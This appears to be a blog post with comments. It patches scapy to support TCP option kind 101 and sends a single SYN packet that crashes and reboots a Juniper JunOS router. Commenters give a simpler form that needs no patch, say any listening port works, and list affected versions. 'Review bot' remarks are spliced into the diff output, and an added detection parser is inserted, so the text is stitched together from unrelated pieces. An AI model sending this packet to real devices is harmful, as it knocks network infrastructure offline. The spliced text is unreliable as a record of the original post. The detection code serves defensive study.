Use scapy to send JunOS killin’ packet

Photo from gr33ndata.
I just quickly hacked up scapy so that it would support sending TCP packets with option kind 0x65 (decimal 101). A diff is below (basically, just need to add two lines).
For reference, I’m on a FreeBSD 8.0 box running scapy 2.1.0 (from ports). inet.py is located in /usr/local/lib/python2.6/site-packages/scapy/layers.
$ diff inet.py inet.py.bak
203,204c203
< 15 : ("AltChkSumOpt",None),
< 101 : ("JunOS",None)
---
> 15 : ("AltChkSumOpt",None)
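Review bot: the two `<` lines at 203,204 are the additions, not removals, because the command above passes the modified inet.py first and inet.py.bak second, so this hunk reads backwards to anyone who expects old-to-new order. Regenerating it as `diff -u inet.py.bak inet.py` would show the new 101 entry and the trailing comma added after the AltChkSumOpt entry as `+` lines, and would give output that `patch` can apply directly.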
215d213
< "JunOS":101
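Review bot: the `"JunOS":101` entry at line 215 introduces a name that exists only in this local copy, and nothing in the hunk says so. A one-line comment beside it, and beside the matching 101 entry at line 204, marking the name as a local test alias would help, since the file being edited is the installed copy under site-packages and the change disappears when the port is reinstalled.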
$
Once we've done that, we can then use scapy to launch a JunOS killin' packet for us!
$ sudo scapy
Welcome to Scapy (2.1.0)
>>> p=IP(dst='192.168.1.61')/TCP(dport=23,flags='S',options=[('JunOS', '')])
>>> send(p)
.
Sent 1 packets.
>>>
The box, of course, crashed and rebooted immediately.
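Seen from the monitoring side, the packet above is an ordinary TCP header whose option list contains kind 101. The following is an added example, not part of the original post: a stdlib-only parser that walks the option list of a raw TCP header and reports kind 101 or a malformed list. The function names and the sample headers (ports, sequence number, window) are constructed for illustration.

```python
import struct

SUSPECT_KIND = 101  # 0x65, the TCP option kind this post sends

def tcp_options(hdr: bytes):
    """Yield (kind, value) for each option in a raw TCP header."""
    if len(hdr) < 20:
        raise ValueError("truncated TCP header")
    hdr_len = (hdr[12] >> 4) * 4          # data offset, in bytes
    if hdr_len < 20 or hdr_len > len(hdr):
        raise ValueError("bad data offset")
    opts, i = hdr[20:hdr_len], 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:                     # End of Option List
            return
        if kind == 1:                     # NOP is a single byte
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("option has no length byte")
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("option length out of range")
        yield kind, opts[i + 2:i + length]
        i += length

def classify(hdr: bytes) -> str:
    """Return 'kind-101', 'malformed' or 'ok' for one TCP header."""
    try:
        kinds = [kind for kind, _ in tcp_options(hdr)]
    except ValueError:
        return "malformed"
    return "kind-101" if SUSPECT_KIND in kinds else "ok"

def sample_header(options: bytes) -> bytes:
    """Constructed SYN header (ports and sequence number are made up)."""
    options += b"\x00" * (-len(options) % 4)      # pad to 32-bit words
    words = 5 + len(options) // 4
    return struct.pack("!HHIIBBHHH", 40000, 23, 1, 0,
                       words << 4, 0x02, 8192, 0, 0) + options

SAMPLES = {
    "mss only": sample_header(b"\x02\x04\x05\xb4"),
    "kind 101, length 2": sample_header(b"\x65\x02"),
    "kind 101, bad length": sample_header(b"\x65\x09"),
}

if __name__ == "__main__":
    for name, hdr in SAMPLES.items():
        print(f"{name}: {classify(hdr)}")
```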
does the vulnerability get exploited on any destination port other than telnet? what if you sent the same packet to 179, 22, 443, etc?
@anon — According to Juniper’s PSN, it should work on any TCP port that is “listening”. So it would work on 179, 22, 443, etc. if BGP/SSH/HTTPS etc. were running. I’ve tested it on 22/TCP, 23/TCP, and 80/TCP.
thanks for confirming..what a mess!
I am wondering if anybody has actually confirmed that this works on the super old versions of JunOS I am using… My guess is that the old versions with FreeBSD 4.11 underneath may not have this problem. I cannot get my 7.4 Olive box to crash, nor a M40 with 7.0.
No need to patch Scapy: TCP(options=[(101, '')])
I couldn’t duplicate this on a M series running 7.6R3.6. I did duplicate this on 8.5R4.3.
Thanks for the code!
I confirmed this works on 7.6I2
@anonymous_coward — Thanks! I don’t use scapy much and didn’t realize I could pass options like that.
@Derek — thanks for the confirmation!
The only 7.x version I have is 7.3R3.6. If I have time tonight, I’ll install it and see if I can get it to crash.